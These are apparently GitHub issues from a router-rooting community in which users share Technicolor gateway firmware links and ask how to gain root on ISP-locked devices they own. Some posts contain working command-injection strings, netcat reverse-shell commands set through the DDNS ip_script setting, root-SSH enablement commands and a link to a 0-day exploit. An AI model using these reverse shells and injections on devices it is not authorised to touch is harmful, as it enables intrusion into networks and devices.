General info

My gateway is currently running firmware version 17.2.0405-2081007-ACR12 from Vodafone in Australia.

• Product: DMA0120VHA
• ISP: Vodafone
• Countries: Australia
• Commercial name from the ISP: Vodafone WiFi Hub (Vodadafone-wifi-hub-guide.pdf - src)
• Board: VBNT-R

Did anybody ever manage to get root on that device already?
I've spent hours searching and can find very little about this board.

Select all applicable

• Yes, by using a root strategy listed in the wiki
• Yes, following another different strategy
• No, as far as I know it has never been rooted

Firmware versions

• Version: 17.2.0227
• Full version: 17.2.0227-2081006-CRF739
• Custom firmware version strings used by ISP in addition to the above:
• RBI file name: ???
• RBI official download URL: n/a
• Raw bank dump download link: n/a
• Serial console bootlog: n/a
• Other potentially relevant info about this firmware version:

• Version: 17.2.0288
• Full version: 17.2.0288-2081016-CRF880
• Custom firmware version strings used by ISP in addition to the above:
• RBI file name: Vodafone-wi-fi-hub-firmware-CRF880.rbi
• RBI official download URL:
  • https://www.vodafone.com.au/content/software/Vodafone-wi-fi-hub-firmware-CRF880.rbi
• Raw bank dump download link: n/a
• Serial console bootlog: n/a
• Other potentially relevant info about this firmware version:

Vodafone-wi-fi-hub-firmware-CRF880.zip

• Version: 17.2.0338
• Full version: 17.2.0338-2081011-CRF976
• Custom firmware version strings used by ISP in addition to the above:
• RBI file name: Vodafone-wi-fi-hub-firmware-CRF976.rbi
• RBI official download URL:
  • https://www.vodafone.com.au/content/software/Vodafone-wi-fi-hub-firmware-CRF976.rbi
• Raw bank dump download link: n/a
• Serial console bootlog: n/a
• Other potentially relevant info about this firmware version:

Vodafone-wi-fi-hub-firmware-CRF976.zip

• Version: 17.2.0405
• Full version: 17.2.0405-2081007-ACR12
• Custom firmware version strings used by ISP in addition to the above:
• RBI file name: Vodafone-wi-fi-hub-firmware-ACR12.rbi
• RBI official download URLs:
  • https://www.vodafone.com.au/content/software/Vodafone-wi-fi-hub-firmware-ACR12.rbi
  • https://s3-us-west-1.amazonaws.com/static.vodafone.com.au/content/WHS/Vodafone-wi-fi-hub-firmware-ACR12.zip
• Raw bank dump download link: n/a
• Serial console bootlog: n/a
• Other potentially relevant info about this firmware version:

Vodafone-wi-fi-hub-firmware-ACR12.zip

AFG and tch-exploit failed, manual DDNS exploit worked.

Telia VANT-W Version 17.2.0339
:::::::nc "ip" "port" -e /bin/sh
then
nc -lvvp "port"
used wusemans guide.

Originally posted by @Vargaskri in #47 (comment)

Win10, Installed Anaconda Distribution without selecting any options

1. run activate base - does nothing. >- Start Anaconda Prompt from Start menu.

2. Click on serve.bat - does nothing. >- Start Anaconda Prompt, change to hack-technicolor directory, run serve.bat

Hi all,
i am looking for the following firmware: Tiscali_DGA4130_17.1.7970-0001001-20180301141418
can anyone re-seed it on torrent? Last days i didn't find any peer providing it.

Thank you
Matte

Firmware version
17.2.0278-0901009-20180108115410-2597a15beef0a16dce9ac18ae3eef4aeb0fd16a4

Image Format

• Bank Dump (compressed as xz)
• RBI

Would you take care of adding this new firmware in the wiki?

• Yes! I will take care of that
• No, do it for me, I can't use GitHub...

Where can we get it?

• From ISP's url - public
• From ISP's url - private
• From own cloud sharing
• Attached to this post

Did you manage to root this firmware version already?

• Yes, following Type 2 instructions (strategy #A)
• Yes, following Type 1 instructions
• Yes, following Type 3 instructions
• Yes, following these instructions
• No, I can't root it following instructions from the wiki
• I didn't try

Type: HTTPS
Link: vant8-mtd-dump-17.2.0278.tar.gz

Device Info

Board Mnemonic: VANT-8

Model Number: TG589vac v2 wikidev not sure if mine is HP(high power)

Vendor Name/Code: SSE, UK

This is quite an interesting, farily widely avaliable and very capable VDSL2 modem router in the UK, I found I could get root access using these instruction.

interestingly this seems to share distro with TG799 (VANTF).

root@dsldevice:~# cat /etc/openwrt_release
DISTRIB_ID='OpenWrt'
DISTRIB_RELEASE='Chaos Calmer'
DISTRIB_REVISION='r46610'
DISTRIB_CODENAME='chaos_calmer'
DISTRIB_TARGET='brcm63xx-tch/VANTF'
DISTRIB_DESCRIPTION='OpenWrt Chaos Calmer 15.05.1'
DISTRIB_TAINTS='no-all busybox'

however is a separate board

root@dsldevice:~# dmesg | grep VANT
[ 0.000000] VANT-8 prom init
[ 0.000000] Kernel command line: root=31:0 ro noinitrd memsize=0xFFDD000 btab=0xc004280c btab_bootid=1 tbbt_addr=0x7d20000 board=VANT-8 console=ttyS0,115200 root=/dev/mtdblock1 rootfstype=squashfs irqaffinity=0 console=ttyS0,115200 root=/dev/mtdblock1 rootfstype=squashfs irqaffinity=0
[ 13.663000] Set board (VANT-8)

The dump is directly from the mtd 3 bank_1 partition, so not an rbi. I think this may be more useful as an encrypted rbi to help anyone get root or recover from a failed flash etc. Trying to get a firware url using strings yields nothing useful: (This may be because I disabled cwmpd )

root@dsldevice:~# strings /etc/cwmpd.db
SQLite format 3
tabletidkvtidkv
CREATE TABLE tidkv ( type TEXT NOT NULL, id TEXT NOT NULL, key TEXT NOT NULL, value TEXT, PRIMARY KEY (type, id, key)))
indexsqlite_autoindex_tidkv_1tidkv
runtimevarParameterKey#
runtimevarConfigurationVersion-
%1runtimevarBootStrappedhttp://nld-acs.com-<
+/VersionsSoftwareVersion17.2.0278-0901009
VersionsSoftwareVersion<
runtimevarParameterKey
runtimevarConfigurationVersion
runtimevarBootStrapped
+ VersionsSoftwareVersion

It's running a modified version of OpenWRT 15.04 out of the box. Found I could install standard 15.04 opkg's via the following two changes:

root@dsldevice:~# cat /etc/opkg.conf
arch all 100
arch brcm63xx 200
arch brcm63xx-tch 300

and

root@dsldevice:~# cat /etc/opkg/distfeeds.conf
src/gz chaos_calmer http://archive.openwrt.org/chaos_calmer/15.05.1/brcm63xx/smp/packages/base
src/gz luci http://archive.openwrt.org/chaos_calmer/15.05.1/brcm63xx/smp/packages/luci
src/gz management http://archive.openwrt.org/chaos_calmer/15.05.1/brcm63xx/smp/packages/management
src/gz routing http://archive.openwrt.org/chaos_calmer/15.05.1/brcm63xx/smp/packages/routing
src/gz packages http://archive.openwrt.org/chaos_calmer/15.05.1/brcm63xx/smp/packages/packages
src/gz telephony http://archive.openwrt.org/chaos_calmer/15.05.1/brcm63xx/smp/packages/telephony

then opkg update

(do not opkg upgrade, may brick)

Have note played around much more than that as I was trying to get this working with fast wifi roaming in my nework (802-11r, it has 802.11ac ...).

No luck switching between banks via echo bank_2 > /proc/banktable/active (always reboots into bank_1)

Not sure how to dump OSCK keys (instructions welcome...).

General info

My gateway is currently running firmware version ??? from Cox in USA

• Product: CGM4140COM
• ISP: Cox/Comcast
• Countries: USA
• Commercial name from the ISP: Panoramic Wifi Gateway, Comcast sells it as the XB6
• Board: Board unknown

Did anybody ever manage to get root on that device already?

Select all applicable

• Yes, by using a root strategy listed in the wiki
• Yes, following another different strategy
• No, as far as I know it has never been rooted

Firmware versions

Please fill as many available info about each firmware versions you have ever heard about for this board. Leave unknown parts empty.

• Version: Unknown
• Full version: Unknown
• Custom firmware version strings used by ISP in addition to the above: The current 'software image name' displayed on the modem's page says "CGM4140COM_4.2p15s1_PROD_sey", and I can't decipher a version or any information for it. Naming is odd
• RBI file name: It's possibly the image file name above but I'm not sure
• RBI official download URL: Unknown
• Other RBI download links for us to look into it: None
• Raw bank dump download link: Don't have
• Serial console bootlog: Don't have
• Other potentially relevant info about this firmware version: The Comcast and Cox versions have the same software image name/version
  A seperate version is displayed for eMTA/DOCSIS, which is "Prod_18.3_d31 & Prod_18.3"

Other details

This device is quite peculiar. It seems like Cox is buying them from Comcast and slapping their label on it, as in multiple places on the modem's page it mentions XB6 and the webserver on it shows as Xfinity broadcast server.
Also of note: SSH port on the modem is filtered, SSH is inaccessible because of it
There is also no WAN port on this modem

Here's a seemingly good reference for the hardware of this thing:
https://deviwiki.com/wiki/Technicolor_CGM4140COM

Please fill out the following, remembering to put an 'X' in the '[ ]' to mark the checkbox:

Firmware version
VERSION

Image Format

• Bank Dump (compressed as xz)
• RBI

Would you take care of adding this new firmware in the wiki?

• Yes! I will take care of that
• No, do it for me, I can't use GitHub...

Where can we get it?

• From ISP's url - public
• From ISP's url - private
• From own cloud sharing

Did you manage to root this firmware version already?

• Yes, following Type 2 instructions
• Yes, following Type 1 instructions
• Yes, following Type 3 instructions
• No, I can't root it following instructions from the wiki
• I didn't try

Type: <eg. FTP HTTP>

Link:

Device Info

Board Mnemonic: <eg: VCNT-A for DJA0231TLS>

Model Number: <eg: DJA0231 for DJA0231TLS>

Vendor Name/Code: <eg: Telstra or TLS for DJA0231TLS>

Important: Please, check firmware isn't already listed in Latest branch before opening a new one. Use the "Model Support Request" issue template in place of this one in case you're going to share the first firmware for your gateway device.

Please fill out the following, remembering to put an 'x' in the '[ ]' to mark the checkbox:

Firmware version

18.1.c.0549-MR17-RB

Device Info

Board Mnemonic: VBNT-V

Model Number: DJA0230

Vendor Name/Code: Telstra

Where did you find it?

ISP RBI file link (if known):

• Protocol: HTTP
• Link: http://fwstore.bdms.telstra.net/Technicolor_vbnt-v_18.1.c.0549-MR17-RB/vbnt-v_18.1.c.0549-MR17-RB.rbi
• Restrictions (if any):

Attach the RBI firmware in case above URL is restricted, or attach a bank dump if RBI URL is unknown:

• Firmware file:

Did you manage to root this firmware version already?

• Yes, following Type 2 instructions
• Yes, following Type 1 instructions
• Yes, following Type 3 instructions
• No, I can't root it following instructions from the wiki
• I didn't try

Would you take care of adding this new firmware in the wiki?

• Yes! I will take care of that
• No, do it for me, I can't use GitHub...

It's mentioned in the firmware files but not in the supported list, wondering if I'm going to brick this bad boy.

We have an issue that needs to be addressed sooner or later. We rely on public URL's to download RBI firmwares, and we started archiving "special" firmwares inside this repo itself.
Older URL's may get broken anytime. Whenever this happens, we couldn't rely on this git repo for file storage, otherwise the repo will indefinitely grow up in size, and this is not desirable for a git repo (side note: we also must migrate the current existing firmware folder into git-lfs https://github.com/git-lfs/git-lfs/wiki/Tutorial) and will not fit github disk quota.

My proposal: we could create a single torrent for each RBI, adopting the webseed spec (read here: http://wiki.theory.org/BitTorrentSpecification#WebSeeding), using the original URL we already collected as webseeds. There will be no differences while the URL is still valid, but users may ask for torrent reseed whenever it goes down. Also, rare files with no more valid webseed URL may be uploaded to free torrent seedboxes Torrent metadata files would be hosted here in this repo with no issues, they're small. Of course we can't just store magnets, otherwise reseeding would be impossibile - as you may know you need the full .torrent metadata to reseed..

Hi

Would anyone help to find the CRF or the new firmware URL for DJA0231?

The new firmware is: 18.1.c.0514-950-RB

CRF is beyond 999

Should I try 1000+?

Thanks

Neal

Important: Check issue still occurs in Latest branch.

Please fill out the following, remembering to put an 'X' in the '[ ]' to mark the checkbox:

Firmware version
Technicolor_vcnt-a_ACR-13-18.1.c.0514-950-RB/vcnt-a_ACR-13-18.1.c.0514-950-RB.rbi

Image Format

• RBI

Would you take care of adding this new firmware in the wiki?

• Yes! I will take care of that
• No, do it for me, I can't use GitHub...

Where can we get it?

• From ISP's url - public
• From ISP's url - private
• From own cloud sharing

Did you manage to root this firmware version already?

• Yes, following Type 2 instructions

Type: HTTP
Link: http://fwstore.bdms.telstra.net/Technicolor_vcnt-a_ACR-13-18.1.c.0514-950-RB/vcnt-a_ACR-13-18.1.c.0514-950-RB.rbi

Device Info
DJA0231.
Board Mnemonic: VCNT-A
Model Number:DJA0231
Vendor Name/Code: Telstra

https://hack-technicolor.readthedocs.io/en/stable/Repository/#telia-wifi-router-plus
IP 131.116.22.230 does not go anywere.

Important: Please, check firmware isn't already listed in Latest branch before opening a new one. Use the "Model Support Request" issue template in place of this one in case you're going to share the first firmware for your gateway device.

Please fill out the following, remembering to put an 'x' in the '[ ]' to mark the checkbox:

Firmware version

18.1.c.0514-950-RB

Device Info

Board Mnemonic: VBNT-V

Model Number: DJA0230

Vendor Name/Code: Tesltra

Where did you find it?

ISP RBI file link (if known):

• Protocol:
• Link:
• Restrictions (if any):

Attach the RBI firmware in case above URL is restricted, or attach a bank dump if RBI URL is unknown:

• Firmware file:

Did you manage to root this firmware version already?

• Yes, following Type 2 instructions
• Yes, following Type 1 instructions
• Yes, following Type 3 instructions
• No, I can't root it following instructions from the wiki
• [ x] I didn't try

Would you take care of adding this new firmware in the wiki?

• Yes! I will take care of that
• [ x] No, do it for me, I can't use GitHub...

Notes:
Sorry if this is annoying, the firmware is in the repo, but it isn't on there for my model so I didn't know if I would be able to flash or not.

General info

My gateway is currently running firmware version 17.4.c.0277-2441004-20190521105542 from Vodafone in UK

• Product: DGA4231VDF
• ISP: Vodafone
• Countries: UK
• Commercial name from the ISP: Vodafone Wi-Fi Hub
• Board: VCNT-I

Did anybody ever manage to get root on that device already?
No, other variant with loder firmware are vulnerable to ddns bug... Tested and it seems to be patched (a direct request respond with faildto save)

Select all applicable

• Yes, by using a root strategy listed in the wiki
• Yes, following another different strategy
• No, as far as I know it has never been rooted

Say something more about the adopted strategy here

This should be vulnerable to the #C strategy but i can't manage to make it work. The default vodafone configuration for uk should be using a pppoe connection.

Firmware versions

There are 2 version. The modem has born with 17.4.c and then they updated to 19.3. I still can't find any way to download rbi.

• Serial console bootlog: https://pastebin.com/mGQWAey2

Other details

everything else you already discovered or tried for this device and other details like how this usually receives firmware upgrades and if you know something more about this

The rbi are send with cwmp so to grab them we need to sniff a cwmp transaction and steal the firmware repo from vodafone co.uk
I checked the webui and vodafone devs produce a general webui for all the variant and then they just disable some part based on the country (for example nz have tons of more feature than the uk variant). Trying to access the disabled page result in a 404 Not Found.

Connecting the ethernet wan port cause the internet led to blink so it seems it does try to do some type of connection using the wan port but still the tch-exploit doesn't see anything. Can someone give me some hints or how to check what actually does the modem using wireshark ?

• TG-1 Firmware
• Markdown links
• Overhaul Structure (maybe a table??)

Please fill out the following, remembering to put an 'X' in the '[ ]' to mark the checkbox:

Type

• Bank Dump
• URL

Have you followed formatting?

• Yes
• No
• Please check for me :)

Image Format

• Link to Bank Dump (compressed as xz)
• Link to RBI

Where we can get it

• From ISP's url - public
• From ISP's url - private
• From own cloud sharing

URL Info

• Easily accessible
  Type: HTTP

Device Info

Board Mnemonic: VBNT-J

Model Number: DJA2130

Vendor Name/Code: Telstra

URL: http://fwstore.bdms.telstra.net/Technicolor_vbnt-j_CRF913-17.2.0284-820-RA/vbnt-j_CRF913-17.2.0284-820-RA.rbi

Firmware version
CRF913-17.2.0284-820-RA.rbi

Just noticed that they released this don’t know what root type.

Product Vendor Technicolor
Product Name MediaAccess TG799vac Xtream
Software Version 17.1
Firmware Version 17.1.7854-0001005-20180216002644-BS
Firmware OID 5a861734835b67358c78212a
Bootloader Version 15.38.724-0000000-20150917132051-d85c65bd2e219aab5422ce7f3366cf1ebe170059
Bootloader OID unknown
Hardware Version VANT-W

I tried to do webui expolit but nothing works. There's even validation which says for example "Enter correct domain name or ip address.

I tried to send reboot using AFG and nothing happened (router didn't reboot), here's screenshot

I also tried to flash it using the telnor firmware and also nothing happened.
I tired ::::::;reboot inside webui and didn't work.

Here's tch-exploit screenshot connected to WAN port with static ip as shown here:https://github.com/BoLaMN/tch-exploit

So what should I do now please?
Thanks a lot for your help.

I have an older TG-1.
Do you know of any way to unlock it?
e.g. exploits you have have found in the technicolor web interface?

Firmware version

18.3.n.0462_FW_261_DGA4131

Device Info

Board Mnemonic: VBNT-O

Model Number: DGA4131FWB

Vendor Name/Code: Fastweb/Tecnicolor

ISP RBI file link (if known):

• Protocol: HTTP
• Link: http://59.0.121.191:8080/ACS-server/file/18.3.n.0462_FW_261_DGA4131.rbi
• Restrictions (if any): ISP Network only

Attach the RBI firmware in case above URL is restricted, or attach a bank dump if RBI URL is unknown:

• Firmware file:

Did you manage to root this firmware version already?

• Yes, following Type 2 instructions
• Yes, following Type 1 instructions
• Yes, following Type 3 instructions
• No, I can't root it following instructions from the wiki
• I didn't try

Would you take care of adding this new firmware in the wiki?

• Yes! I will take care of that
• No, do it for me, I can't use GitHub...

General info

My gateway is currently running firmware version 19.4 in UK.

• Product: DGA0122nlk
• Countries: UK
• Commercial name from the ISP: None known.
• Board: (VCNT-P)

Did anybody ever manage to get root on that device already?

Select all applicable

• Yes, by using a root strategy listed in the wiki
• Yes, following another different strategy
• No, as far as I know it has never been rooted

Say something more about the adopted strategy here

Mainly raising this issue to share the root strategy - not very interested in firmware flashing. The Ping and DDNS web interface validation holes seem to be closed on this version. Using the engineer logon by SSH to change the WPS button handler is blocked now. I had a look at AutoFlashGUI but this model is not explicitly supported (unsure if the below is the same DDNS exploit it uses, or a different one). With engineer SSH access, the following approach works:

• start a netcat listener on your LAN
• logon to the router by SSH as engineer using the admin password from the sticker on the bottom of the router
• change the DDNS client to obtain its IP address from a script instead of from the network:
• set uci.ddns.service.@myddns_ipv4.ip_source script
• set the script to be the netcat reverse shell, including full path to netcat:
• set uci.ddns.service.@myddns_ipv4.ip_script '/usr/bin/nc <ip> <port> -e /bin/sh'
• Login to the router's web interface, go to WAN Services -> DynDNS tab
• In the IPv4 section, click the enable button.

If it works, a reverse shell connects in a few seconds.

Standard instructions for enabling root logon work, except note that root's default shell is now /bin/restricted_shell instead of /bin/false so the sed command has to reflect that, e.g.

sed -i "1s/\/bin\/restricted_shell/\/bin\/ash/" /etc/passwd
uci set dropbear.lan.RootLogin='1'
uci set dropbear.lan.RootPasswordAuth='on'
uci commit
/etc/init.d/dropbear restart

Firmware versions

Please fill as many available info about each firmware versions you have ever heard about for this board. Leave unknown parts empty.

• Version: 19.4.0207
• Full version: 19.4.0207-4381030-20201028185645
• Custom firmware version strings used by ISP in addition to the above: unknown
• RBI file name: no RBI known
• RBI official download URL: no download link known, I have the ISP's server location but no success guessing a download link name
  • The link is restricted to ISP users or requires download password
• Other RBI download links for us to look into it: none known
• Raw bank dump download link: none known, and unwilling to install rom dump / cracking tools on my working router any time soon
• Serial console bootlog: no serial console access; will a dmesg log help?
• Other potentially relevant info about this firmware version:

repeat the same above block of info for each known version you heard about

Other details

everything else you already discovered or tried for this device and other details like how this usually receives firmware upgrades and if you know something more about this

/proc/cpuinfo shows 3 processors, ARMv7 Processor rev 5 (v7l)

/proc/meminfo shows 256MB RAM

Storage looks like:

# df -h
Filesystem                Size      Used Available Use% Mounted on
/dev/root                23.3M     23.3M         0 100% /rom
tmpfs                   122.2M    340.0K    121.9M   0% /tmp
/dev/mtdblock2           20.0M      2.9M     17.1M  14% /overlay
overlayfs:/overlay       20.0M      2.9M     17.1M  14% /
tmpfs                   512.0K         0    512.0K   0% /dev

DSL chipset:

# xdslctl info --vendor
ChipSet Vendor Id:      BDCM:0xa188
ChipSet VersionNumber:  0xa188
ChipSet SerialNumber:

OpenWRT version:

# cat /etc/openwrt_release
DISTRIB_ID='OpenWrt'
DISTRIB_RELEASE='SNAPSHOT'
DISTRIB_REVISION='r13028-8f3e65d75d'
DISTRIB_TARGET='brcm6xxx-tch/VCNTJ_502L07'
DISTRIB_ARCH='arm_cortex-a7'
DISTRIB_DESCRIPTION='OpenWrt SNAPSHOT r13028-8f3e65d75d'
DISTRIB_TAINTS='no-all glibc busybox'

Please fill out the following, remembering to put an 'X' in the '[ ]' to mark the checkbox:

Type

• Bank Dump
• URL

Have you followed formatting?

• Yes
• No
• Please check for me :)

Bank Dump Info

• Compressed as xz
• Uploaded to firmware/

https://www.pastefile.com/2nJlBY

URL Info

• Easily accesible
  Type: <eg. FTP HTTP>

Product Vendor
Technicolor
Product Name
MediaAccess TG789MYRvac v2 HP
Software Version
16.3
Firmware Version
16.3.7190-2761005-20161004084353
Firmware OID
57f34fa94f5105213973abd5
Bootloader Version
2.0.89
Bootloader OID
unknown
Hardware Version
VBNT-L

I recently got a new Technicolor TG799VAC supplied by Telenor (ISP in Denmark). I'm new to these "colors", but i have a decent knowledge of networking. The web-interface is very restricted and i would really like to put it into bridge mode – which is not possible from there.
I've found scripts to bridge the modem and descriping guides, descriping how to get root access to these TG799VAC's using Autoflashgui (Type1 and Type2). The modem comes with firmware '17.1.7932-0001028-20180522152727' (Version 17.1 gold) – I've thoroughly read the guides and tried them out – but no luck so far. I can authenticate, commands are bieng issued, but the modem dosen't reboot or seem to respond in any way. I will be really gratefull, if you have a suggestion.

Let me know, if you need further information.

Best Regards.

Important: Please, check firmware isn't already listed in Latest branch before opening a new one. Use the "Model Support Request" issue template in place of this one in case you're going to share the first firmware for your gateway device.

Please fill out the following, remembering to put an 'x' in the '[ ]' to mark the checkbox:

Firmware version

18.1.c.0514-2881009-20200602123158-950-RB

Device Info

Board Mnemonic: VCNT-A

Model Number: DJA0231TLS

Vendor Name/Code: TLS

Where did you find it? N/A

ISP RBI file link (if known): http://fwstore.bdms.telstra.net/Technicolor_vcnt-a_ACR-13-18.1.c.0514-950-RB/vcnt-a_ACR-13-18.1.c.0514-950-RB.rbi

• Protocol: HTTP
• Link: http://fwstore.bdms.telstra.net/Technicolor_vcnt-a_ACR-13-18.1.c.0514-950-RB/vcnt-a_ACR-13-18.1.c.0514-950-RB.rbi
• Restrictions (if any): Stock Firmware

Attach the RBI firmware in case above URL is restricted, or attach a bank dump if RBI URL is unknown:

• Firmware file: File is too large (42MB)

Did you manage to root this firmware version already?

• Yes, following Type 2 instructions
• Yes, following Type 1 instructions
• Yes, following Type 3 instructions
• No, I can't root it following instructions from the wiki
• I didn't try

Would you take care of adding this new firmware in the wiki?

• Yes! I will take care of that
• No, do it for me, I can't use GitHub...

Need a better homepage. It is currently rubbish

Please fill out the following, remembering to put an 'X' in the '[ ]' to mark the checkbox:

Firmware version
VERSION

Image Format

• Bank Dump (compressed as xz)
• RBI

Would you take care of adding this new firmware in the wiki?

• Yes! I will take care of that
• No, do it for me, I can't use GitHub...

Where can we get it?

• From ISP's url - public
• From ISP's url - private
• From own cloud sharing

Did you manage to root this firmware version already?

• Yes, following Type 2 instructions
• Yes, following Type 1 instructions
• Yes, following Type 3 instructions
• No, I can't root it following instructions from the wiki
• I didn't try

Type: <eg. FTP HTTP>

Link:

Device Info

Board Mnemonic: <eg: VCNT-A for DJA0231TLS>

Model Number: <eg: DJA0231 for DJA0231TLS>

Vendor Name/Code: <eg: Telstra or TLS for DJA0231TLS>

Greetings I'm looking the firmware for Wind provider from Greece for the DGA4130.
I had one Italian from TIM and I need the Greek firmware to flash it and take the network settings including VoIP to be able to function it properly.

I've already own a TG789vac V2, already rooted on 17.2 mint firmware and with latest GUI installed.

Just to easily identify models, add a few (possibly high res) photos of the models in the wiki

PS. why italians models/firmwares are totally hidden from the wiki? :P

Happy New Year to all!

Any chances to decrypt the config.bin from a TG788v v3 in order to retrieve the VoIP credentials?
Unfortunately I don't have the binary and ssh is blocked.
Software version is Version Gold (17.1) (looks like Ansuel GUI).
Any ideas are welcome.
Furthermore, does this board support connection via serial cable in order to retrieve somehow the software binaries perhaps?
I am also willing to ship the board to anyone of you that could help.

Header file is as below:
PREAMBLE=THENC
BACKUPVERSION=1.00
BOARDMNEMONIC=VANT-Z
PRODUCTNAME=MediaAccess TG
SERIALNUMBER=CP1835CZBNB
MAC=A4:91:B1:6B:73:A5
BUILDVERSION=17.1.8001-0001007-20180523145805-4f071fd23e90c774b6827546188a38d6c91cff38
CIPHERKEY=GW
SIGNATUREKEY=GW

Thanks,
Giannis

Hello Everyone,

I'm new here, and I hope I could find help.

.Regarding this router hacking tutorial:
https://hack-technicolor.readthedocs.io/en/latest/Hack%20Type%201&2/

. I'm trying to flash "Telia TechnoColor" modem, I copied those information before starting the hacking tutorial:-
Product Vendor: Technicolor
Product Name: MediaAccess TG799vac
Software Version: 15.3
Firmware Version: 15.51.6436-1361003-20160202112931
Hardware Version: VANT-R
NTP servers: ntp1.rgw.telia.se

. I walked through the process to the "Bank Planning":- (I'm not an advanced user)

The Tutorial says that The optimal bank plan looks like this:
/proc/banktable/active
bank_1
/proc/banktable/booted
bank_2
. I didn't get the same and I don't know what I did wrong? and how can I fix it? and what to do next?.

/proc/banktable/passiveversion
Unknown
/proc/banktable/activeversion
15.51.6436-1361003-20160202112931-ebb9150c3d7ffdd1bb106bc3629d993f5fe2443d
/proc/banktable/inactive
bank_2
/proc/banktable/active
bank_1
/proc/banktable/notbooted
bank_2
/proc/banktable/booted
bank_1

Hi. Can you please guide me to the right direction for rooting my this unit?

I have tried to follow the guide and try to flash firmware with bootp tftp method. I tried all type 2 firmwares and all of them return this error on serial console.

*** 30600 kB received ***
*** 30650 kB received ***
*** 30700 kB received ***
*** 30750 kB received ***
*** 30800 kB received ***
*** 30815 kB received ***
TFTP finished
**File is not a valid BLI**
Resetting the gateway
----

Here is more information about the router from serial console

Gateway initialization sequence started
Boot Loader Version : 15.38.724-0000000-20150917132051-d85c65bd2e219aab5422ce7f3366cf1ebe170059
CPU : BCM63137B0
RAM : 256MB
Flash : 125MB NAND
Board Mnemonic : VANT-W
Market ID : FFFC
*** Press b to enter BOOT-P ***

Booting : Bank 2

SW Version : 18.1.0297-1321006-20191213145958

Thank you

I was trying to do firmware upgrade on rooted Technicolor DJA0231 and was doing below commend to unpack the RBI image.

cat "/tmp/new.rbi" | (bli_parser && echo "Please wait..." && (bli_unseal | dd bs=4 skip=1 seek=1 of="/tmp/new.bin"))

Need some help on how to move the RBI file into the USB drive and use it as a working folder.

Important: Please, check issue still occurs in Latest branch before opening a new one. Use the "Model Support Request" issue template in place of this one in case you're going to share the first firmware for your gateway device.

Please fill out the following, remembering to put an 'x' in the '[ ]' to mark the checkbox:

Firmware version

18.1.c.0514-950-RB

Device Info

Board Mnemonic: VCNT-A

Model Number: DJA0231

Vendor Name/Code: Telstra

Where did you find it?

ISP RBI file link (if known):

• Protocol:
• Link:
• Restrictions (if any):

Attach the RBI firmware in case above URL is restricted, or attach a bank dump if RBI URL is unknown:

• Firmware file:

Did you manage to root this firmware version already?

• Yes, following Type 2 instructions
• Yes, following Type 1 instructions
• Yes, following Type 3 instructions
• No, I can't root it following instructions from the wiki
• I didn't try

Would you take care of adding this new firmware in the wiki?

• Yes! I will take care of that
• No, do it for me, I can't use GitHub...

Please fill out the following, remembering to put an 'X' in the '[ ]' to mark the checkbox:

Type

• Bank Dump
• URL

Have you followed formatting?

• Yes
• No
• Please check for me :)

Bank Dump Info

• Compressed as rbi
• Uploaded to firmware/

URL Info

• Easily accesible
  Type: FTP

Device Info

Mnemonic: VANT-6

Model Number: TG789vac v2

URL: ftp://ftp.iinet.net.au/pub/iinet/firmware/TG789vacV2/VANT-6/.2752ae5a/vant-6_16.3.8046-ver2.5.3-CRF927-2721031.rbi

I was just reading the rooting guide out of curiosity and noticed there is a newer version on my TG789... I stumbled across the actual stock firmware URL and thought I'd post it here, to be added.

Firmware version

18.1.c.0585-MR7.1-RA

Device Info

Board Mnemonic: VCNT-A

Model Number: DJA0231

Vendor Name/Code: TLS

Where did you find it?

ISP RBI file link (if known): http://fwstore.bdms.telstra.net/Technicolor_vcnt-a_18.1.c.0585-MR7.1-RA.rbi/vcnt-a_18.1.c.0585-MR7.1-RA.rbi

• Protocol: HTTP
• Link: http://fwstore.bdms.telstra.net/Technicolor_vcnt-a_18.1.c.0585-MR7.1-RA.rbi/vcnt-a_18.1.c.0585-MR7.1-RA.rbi
• Restrictions (if any):

Did you manage to root this firmware version already?

• Yes, following Type 2 instructions
• Yes, following Type 1 instructions
• Yes, following Type 3 instructions
• No, I can't root it following instructions from the wiki
• I didn't try

Would you take care of adding this new firmware in the wiki?

• Yes! I will take care of that
• No, do it for me, I can't use GitHub...

Hi,

I have used one new way to get the root access back after an update. This looks more user friendly and does not require physical access to the device (for MITM attack). The only requirement: it will only work if you have had root access previously and saved the symmetric encryption key /proc/rip/0108

https://github.com/antnks/technicolor-config-decrypt

Please let me know if there is an interest and will prepare python proof of concept and prepare the documentation

@LuKePicci @flywire Safe to merge lastest to stable?

As @LuKePicci commented on his latest commit (fab493b):

Permanent root access section still missing, however
the previous one was not sufficient for a lot of devices,
will write a better one "soon".

Maybe the guide needs to become more model specific with like a choose your own path style?

I need help configuring TechniColor TG799vac VANT-R
Until there is a custom GUI for the VANT-R, I'll be have to use a tool to edit the config files,
I have PuTTY, WinSCP.
but I'm not familiar with either them nor linux.

Now, what is the information required about my current ISP "WE", that need to be edited so the router would connect to that ISP

also I'll ask for commands later after collecting those infos

ISP user name is like: [email protected]
password is like: 25624120

-Before doing anything, I'm trying to backup all configuration to USB drive connected to the router
USB: Kingston_DT101G2_1_3814
File Name: wifi+switch.tar.gz
-but the command is probably wrong :D

root@OpenWrt:~# sysupgrade -i -b of=/mnt/usb/Kingston_DT101G2_1_3814/wifi+switch.tar.gz
bla bla blah
- /tmp/sysupgrade.conffiles 2/78 2% (freezes at 2%)

Torrent files dont work
https://github.com/kevdagoat/hack-technicolor/tree/master/torrents/vant-r

Describe Feature Request
I've got a bunch of exploits (read: 0-Days) for the Arcadyan version of the Telstra Smart Modem Gen 2 (LH1000 model). Would it make sense to add them here? (even though they are from a different manufacturer)

Hi,

Full Disclosure team would like to contribute to this great project and we release a 0-day exploit for Technicolor "Content Sharing" feature:

https://github.com/full-disclosure/FDEU-CVE-2020-1FC5

Requirements:

1. local restricted admin web access
2. empty USB flash drive
3. Linux machine to format drive as ext2

This has been tested on TG389ac Telia Lithuania v.17.1.7992

Telia Xtream v2

Edit: URL fixed.

https://nr1.nu/technicolor/firmware/VDNT-O/1720405o1901012closed.rbi

Hi,

I have found a new way to force bank switch.

Prerequisites:

1. serial pins soldered
2. a niddle

Steps:

1. Connect to serial port
2. When you see u-boot message "Booting : Bank 2" - shorten IO0 and IO1 of NAND for a second
3. You should see stack dump, the boot attempt will fail and restart
4. Goto 2 and perform the same two more times
5. After the third attempt the board will boot Bank 1
6. Most of the time Bank 1 contains "previous" vulnerable version of firmware, get root access using some public exploit

If there is an interest, I will document the process

Thanks

Please fill out the following, remembering to put an 'X' in the '[ ]' to mark the checkbox:

Type

• Bank Dump
• URL

Have you followed formatting?

• Yes
• No
• Please check for me :)

Bank Dump Info

• Compressed as xz
